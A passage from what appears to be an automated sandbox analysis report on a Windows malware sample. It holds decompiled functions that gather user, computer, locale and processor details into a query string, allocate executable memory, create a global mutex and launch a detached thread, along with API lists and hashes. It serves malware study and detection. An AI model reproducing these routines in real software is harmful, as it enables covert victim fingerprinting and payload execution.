                                         				if(SLOT(_t91, 0x18) != 0) {
                                         					lstrcatW(_t96, FIELD(_t91, 0x1c));
                                         					lstrcatW(_t96, L"=");
                                         					lstrcatW(_t96, FIELD(_t91, 0x20));
                                         					lstrcatW(_t96, L"&");
                                         				}
                                         				if(SLOT(_t91, 0x24) != 0) {
                                         					lstrcatW(_t96, FIELD(_t91, 0x28));
                                         					lstrcatW(_t96, L"=");
                                         					lstrcatW(_t96, FIELD(_t91, 0x2c));
                                         					lstrcatW(_t96, L"&");
                                         				}
                                         				if(SLOT(_t91, 0x30) != 0) {
                                         					lstrcatW(_t96, FIELD(_t91, 0x34));
                                         					lstrcatW(_t96, L"=");
                                         					lstrcatW(_t96, FIELD(_t91, 0x38));
                                         					lstrcatW(_t96, L"&");
                                         				}
                                         				if(SLOT(_t91, 0x3c) != 0) {
                                         					lstrcatW(_t96, FIELD(_t91, 0x40));
                                         					lstrcatW(_t96, L"=");
                                         					lstrcatW(_t96, FIELD(_t91, 0x44));
                                         					lstrcatW(_t96, L"&");
                                         				}
                                         				if(SLOT(_t91, 0x48) != 0) {
                                         					lstrcatW(_t96, FIELD(_t91, 0x4c));
                                         					lstrcatW(_t96, L"=");
                                         					lstrcatW(_t96, FIELD(_t91, 0x50));
                                         					lstrcatW(_t96, L"&");
                                         				}
                                         				if(SLOT(_t91, 0x54) != 0) {
                                         					lstrcatW(_t96, FIELD(_t91, 0x58));
                                         					lstrcatW(_t96, L"=");
                                         					lstrcatW(_t96, FIELD(_t91, 0x5c));
                                         					lstrcatW(_t96, L"&");
                                         				}
                                         				if(SLOT(_t91, 0x60) != 0) {
                                         					/* This entry is a pair of 32-bit values (offsets 0x6c/0x70) printed as hex, or
                                         					   "undefined" when the first is zero. The 0x42-byte scratch buffer is committed
                                         					   with 0x3000 = MEM_COMMIT|MEM_RESERVE and 0x40 = PAGE_EXECUTE_READWRITE. */
                                         					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
                                         					_t94 = SLOT(_t91, 0x6c);
                                         					_a4 = _t47;
                                         					if(_t94 == 0) {
                                         						wsprintfW(_t47, L"undefined");
                                         					} else {
                                         						wsprintfW(_t47, L"%x%x", _t94, SLOT(_t91, 0x70));
                                         					}
                                         					lstrcatW(_t96, FIELD(_t91, 0x64));
                                         					lstrcatW(_t96, L"=");
                                         					lstrcatW(_t96, _a4);
                                         					lstrcatW(_t96, L"&");
                                         					VirtualFree(_a4, 0, 0x8000); // executed, 0x8000 = MEM_RELEASE
                                         				}
                                         				if(SLOT(_t91, 0x74) != 0) {
                                         					lstrcatW(_t96, FIELD(_t91, 0x78));
                                         					lstrcatW(_t96, L"=");
                                         					lstrcatW(_t96, FIELD(_t91, 0x7c));
                                         					lstrcatW(_t96, L"&");
                                         				}
                                         				/* Overwrite the last WCHAR (the trailing '&') with NUL; the decompiler's
                                         				   offset arithmetic is in bytes, hence the char* cast. */
                                         				*(short*)((char*)_t96 + lstrlenW(_t96) * 2 - 2) = 0;
                                         				return _t96;
                                         			}







                                        APIs
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6F61
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6F69
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6F72
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D6F7A
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6F85
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6F8D
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6F93
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D6F9B
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FA7
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6FAF
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FB5
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D6FBD
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FC9
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6FD1
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FD7
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D6FDF
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FEB
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6FF3
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FF9
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7001
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D700D
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D7015
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D701B
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7023
                                        • lstrcatW.KERNEL32(?,0F9D4966), ref: 0F9D702F
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D7037
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D703D
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7045
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7051
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D7059
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D705F
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7067
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7073
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D707B
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7081
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7089
                                        • VirtualAlloc.KERNELBASE(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0F9D4699,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0F9D709C
                                        • wsprintfW.USER32 ref: 0F9D70B6
                                        • wsprintfW.USER32 ref: 0F9D70C7
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D70D4
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D70DC
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D70E2
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D70EA
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F9D70F6
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7106
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D710E
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7114
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D711C
                                        • lstrlenW.KERNEL32(?,00000000,00000000,?,?,0F9D4699,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D711F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                         • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
                                        • String ID: %x%x$undefined
                                        • API String ID: 3872469520-3801831566
                                        • Opcode ID: f222761f4124e5e41ce50eba9895cdc82a3febf678536e779fec42ecabd81e0d
                                        • Instruction ID: 50238e5268f9147d1b3f3daddc1a401e90855ba7c8e95b1c6fec1adecca871f2
                                        • Opcode Fuzzy Hash: f222761f4124e5e41ce50eba9895cdc82a3febf678536e779fec42ecabd81e0d
                                        • Instruction Fuzzy Hash: E9518330106654B6DB233F6ACC4AFDF3A1CEFC6304F158050FB152419B8B699256DFAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0F9D39F0: GetProcessHeap.KERNEL32(?,?,0F9D4637,00000000,?,00000000,00000000), ref: 0F9D3A8C
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F9D7357
                                          • Part of subcall function 0F9D7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0F9D7368
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F9D7386
                                          • Part of subcall function 0F9D7330: GetComputerNameW.KERNEL32 ref: 0F9D7390
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F9D73B0
                                          • Part of subcall function 0F9D7330: wsprintfW.USER32 ref: 0F9D73F1
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F9D740E
                                          • Part of subcall function 0F9D7330: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F9D7432
                                          • Part of subcall function 0F9D7330: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0F9D4640,?), ref: 0F9D7456
                                          • Part of subcall function 0F9D7330: RegCloseKey.ADVAPI32(00000000), ref: 0F9D7472
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7192
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D719D
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71B3
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71BE
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71D4
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71DF
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71F5
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(0F9D4966,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7200
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7216
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7221
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7237
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7242
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7261
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D726C
                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D465C
                                        • lstrcpyW.KERNEL32 ref: 0F9D467F
                                        • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4686
                                        • CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D469E
                                        • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46AA
                                        • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46B1
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46CB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                         • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
                                        • String ID: Global\
                                        • API String ID: 3131499543-188423391
                                        • Opcode ID: 91c9ba5e8016759d1d33f44c45847dda1f1c19209f221feeb9f128592384ed4e
                                        • Instruction ID: 7d452d390671e7f075607f68ebe5ffd14b81f1648f188002da5812e2c0d33988
                                        • Opcode Fuzzy Hash: 91c9ba5e8016759d1d33f44c45847dda1f1c19209f221feeb9f128592384ed4e
                                        • Instruction Fuzzy Hash: B12138316543117BF234A768DC4AF7F765CDB80B55FB00628F606660C2EAE87D14C6EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 193 f9d7c10-f9d7c1d 194 f9d7c1f-f9d7c29 VirtualFree 193->194 195 f9d7c2b-f9d7c2f 193->195 194->195 196 f9d7c3d-f9d7c41 195->196 197 f9d7c31-f9d7c3b VirtualFree 195->197 198 f9d7c4f-f9d7c53 196->198 199 f9d7c43-f9d7c4d VirtualFree 196->199 197->196 200 f9d7c55-f9d7c5f VirtualFree 198->200 201 f9d7c61-f9d7c65 198->201 199->198 200->201 202 f9d7c67-f9d7c71 VirtualFree 201->202 203 f9d7c73-f9d7c77 201->203 202->203 204 f9d7c79-f9d7c83 VirtualFree 203->204 205 f9d7c85-f9d7c89 203->205 204->205 206 f9d7c8b-f9d7c95 VirtualFree 205->206 207 f9d7c97-f9d7c9b 205->207 206->207 208 f9d7c9d-f9d7ca7 VirtualFree 207->208 209 f9d7ca9-f9d7cad 207->209 208->209 210 f9d7caf-f9d7cb9 VirtualFree 209->210 211 f9d7cbb-f9d7cc2 209->211 210->211 212 f9d7cc4-f9d7cd1 VirtualFree 211->212 213 f9d7cd3-f9d7cd5 211->213 212->213
                                        C-Code - Quality: 100%
                                         			E0F9D7C10(intOrPtr* __ecx) {
                                         				// Cleanup routine: the context structure at __ecx holds a series of
                                         				// (in-use flag, buffer pointer) pairs; every buffer whose flag is set is
                                         				// released with VirtualFree(..., 0, MEM_RELEASE). 0x8000 = MEM_RELEASE.
                                         				int _t20;
                                         				intOrPtr* _t24;
                                         
                                         				_t24 = __ecx;
                                         				if( *__ecx != 0) {
                                         					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
                                         				}
                                         				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
                                         					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
                                         				}
                                         				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
                                         					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
                                         				}
                                         				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
                                         					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
                                         				}
                                         				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
                                         					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
                                         				}
                                         				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
                                         					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
                                         				}
                                         				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
                                         					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
                                         				}
                                         				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
                                         					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
                                         				}
                                         				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
                                         					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
                                         				}
                                         				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
                                         					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
                                         				}
                                         				// Note: _t20 is left uninitialised if no buffer was set (decompiler output).
                                         				return _t20;
                                         			}

                                        APIs
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C29
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C3B
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C4D
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C5F
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C71
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C83
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C95
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7CA7
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7CB9
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7CD1
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                         • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        • Opcode ID: 79308fede0dd34f7c785c521a96fb6aa572d869fe66738e1eea17ab525b50520
                                        • Instruction ID: 2dde35d49bffbb49bbc6d1cf7c7ad688f88bf9823c385c9e0f5936e06ac3d16e
                                        • Opcode Fuzzy Hash: 79308fede0dd34f7c785c521a96fb6aa572d869fe66738e1eea17ab525b50520
                                        • Instruction Fuzzy Hash: A0211F30240B04AEE7762A25DD0AFA6B2E5BB40B45F758828F2C1245F18BF57499DF08
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                         			E0F9D72B0(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
                                         				// Registry read helper: _a4 = root key, _a8 = subkey path, _a12 = value name,
                                         				// _a16 = output buffer, _a20 = buffer size. Returns 1 on success, 0 on failure.
                                         				// The APIs list below shows it reading
                                         				// HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString.
                                         				void* _v8;
                                         				long _t11;
                                         				long _t14;
                                         				long _t18;
                                         
                                         				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed; 0x20019 = KEY_READ
                                         				if(_t14 != 0) {
                                         					return 0;
                                         				} else {
                                         					_a8 = _a20; // reuse the _a8 slot as the in/out size argument
                                         					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
                                         					if(_t18 != 0) {
                                         						GetLastError();
                                         						RegCloseKey(_v8);
                                         						return 0;
                                         					} else {
                                         						_t11 = _t18 + 1; // 0x1, executed
                                         						RegCloseKey(_v8); // executed
                                         						return _t11;
                                         					}
                                         				}
                                         			}

                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,0000060C,?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D72C6
                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000080,?,?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D72E7
                                        • RegCloseKey.KERNELBASE(?,?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D72F7
                                        • GetLastError.KERNEL32(?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D7306
                                        • RegCloseKey.ADVAPI32(?,?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D730F
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                         • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$ErrorLastOpenQueryValue
                                        • String ID:
                                        • API String ID: 2437438455-0
                                        • Opcode ID: af505a80bcd8e54166c52c55d3e20a9edc2653fe9ba8d75e764162b63f563ba6
                                        • Instruction ID: 94ab027d20f8a07a38f8fb476f74b7d571647572b9bf46a2f79076786ac883c3
                                        • Opcode Fuzzy Hash: af505a80bcd8e54166c52c55d3e20a9edc2653fe9ba8d75e764162b63f563ba6
                                        • Instruction Fuzzy Hash: BE011A3260511DEBDB119F94ED09D9ABB6CEB09362B108166FD05D6111D7329A34AFE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 219 f9d4bf0-f9d4c29 CreateThread 221 f9d4c2b-f9d4c2f FindCloseChangeNotification 219->221 222 f9d4c35-f9d4c3b 219->222 221->222
                                        C-Code - Quality: 100%
                                         			_entry_(intOrPtr _a8) {
                                         				// Module entry point: spawns the worker thread E0F9D4950 and returns 1
                                         				// immediately, so the payload runs detached from the loader's control flow.
                                         				void* _v8;
                                         				intOrPtr _v12;
                                         				intOrPtr _v16;
                                         				void* _t10;
                                         
                                         				_v16 = 1;
                                         				_v12 = _a8;
                                         				_t10 = CreateThread(0, 0, E0F9D4950, 0, 0, 0); // executed
                                         				_v8 = _t10;
                                         				if(_v8 != 0) {
                                         					// Closes the thread handle. FindCloseChangeNotification resolves to the same
                                         					// address as CloseHandle, so the intended call is most likely CloseHandle.
                                         					FindCloseChangeNotification(_v8); // executed
                                         				}
                                         				return _v16;
                                         			}

                                        APIs
                                        • CreateThread.KERNELBASE ref: 0F9D4C1C
                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0F9D4C2F
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                         • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ChangeCloseCreateFindNotificationThread
                                        • String ID:
                                        • API String ID: 4060959955-0
                                        • Opcode ID: 48cb12911a711d1e0ae6269b98b08b4a26e368db564743880a3633a6e7b456da
                                        • Instruction ID: 70925dfa41bdb85fd63494aa49d68d5455b6cc1a7395b84163fd23db5c34ad49
                                        • Opcode Fuzzy Hash: 48cb12911a711d1e0ae6269b98b08b4a26e368db564743880a3633a6e7b456da
                                        • Instruction Fuzzy Hash: 16F03934A48308FBE720DFA4D90AB8CB774EB04705F30809AFA016B2C1D6B56690CB48
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                         control_flow_graph 228 f9d5880-f9d590c call f9d39f0 call f9d7330 call f9d7140 VirtualAlloc 235 f9d590e-f9d5910 228->235 236 f9d5921-f9d5925 228->236 235->236 237 f9d5912-f9d591f 235->237 238 f9d5927-f9d5936 236->238 237->238 239 f9d594f-f9d5951 238->239 240 f9d5938-f9d593d 238->240 242 f9d5955-f9d595e 239->242 240->239 241 f9d593f-f9d594d 240->241 241->242 243 f9d596d-f9d596f 242->243 244 f9d5960-f9d596b 242->244 245 f9d5973-f9d5975 243->245 244->243 244->245 246 f9d597b-f9d59f8 CryptBinaryToStringA * 2 lstrlenA * 2 VirtualAlloc lstrlenA 245->246 247 f9d5d44 245->247 248 f9d5a0f 246->248 249 f9d59fa-f9d59fc 246->249 250 f9d5d4a 247->250 252 f9d5a17-f9d5a20 lstrlenA 248->252 249->248 251 f9d59fe-f9d5a0d 249->251 253 f9d5d4f-f9d5d6d VirtualFree call f9d7c10 250->253 251->252 254 f9d5a2a 252->254 255 f9d5a22-f9d5a28 252->255 257 f9d5a32-f9d5a3c lstrlenA 254->257 255->254 255->257 259 f9d5a3e-f9d5a4a 257->259 260 f9d5a72-f9d5a79 lstrlenA 257->260 263 f9d5a50-f9d5a55 259->263 261 f9d5a7b-f9d5a7f 260->261 262 f9d5aa1-f9d5b68 lstrcatW lstrlenW call f9d6f40 lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW VirtualAlloc lstrlenW 260->262 264 f9d5a83-f9d5a88 261->264 274 f9d5b6a-f9d5b6c 262->274 275 f9d5b74-f9d5b76 262->275 266 f9d5a57-f9d5a59 263->266 267 f9d5a62-f9d5a6c lstrlenA 263->267 268 f9d5a8a-f9d5a8c 264->268 269 f9d5a95-f9d5a9f lstrlenA 264->269 266->267 271 f9d5a5b-f9d5a5e 266->271 267->263 272 f9d5a6e 267->272 268->269 273 f9d5a8e-f9d5a91 268->273 269->262 269->264 271->267 272->260 273->269 274->275 276 f9d5b6e-f9d5b72 274->276 277 f9d5b7a-f9d5c2e lstrlenW call f9d9010 lstrlenA call f9d5d70 call f9d5e20 CryptBinaryToStringA 275->277 276->277 284 f9d5c36-f9d5c5c lstrlenA VirtualAlloc lstrlenA 277->284 285 f9d5c30 GetLastError 277->285 286 f9d5c5e-f9d5c64 284->286 287 f9d5c66 284->287 285->284 286->287 288 f9d5c6e-f9d5c75 lstrlenA 286->288 287->288 289 f9d5c9e-f9d5cd4 lstrlenA MultiByteToWideChar call f9d54a0 288->289 290 f9d5c77-f9d5c7f 288->290 296 f9d5d07-f9d5d0d 289->296 297 f9d5cd6-f9d5d05 VirtualFree * 3 289->297 291 f9d5c80-f9d5c85 290->291 293 f9d5c87-f9d5c89 291->293 294 f9d5c92-f9d5c9c lstrlenA 291->294 293->294 298 f9d5c8b-f9d5c8e 293->298 294->289 294->291 299 f9d5d0f-f9d5d12 296->299 300 f9d5d14-f9d5d42 VirtualFree * 3 296->300 297->253 298->294 299->300 300->250
                                        C-Code - Quality: 78%
                                        			E0F9D5880(char __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
                                        				char _v295;
                                        				char _v296;
                                        				char _v404;
                                        				char _v408;
                                        				void* _v428;
                                        				CHAR* _v432;
                                        				int _v436;
                                        				int _v440;
                                        				char _v442;
                                        				CHAR* _v444;
                                        				short _v448;
                                        				int _v452;
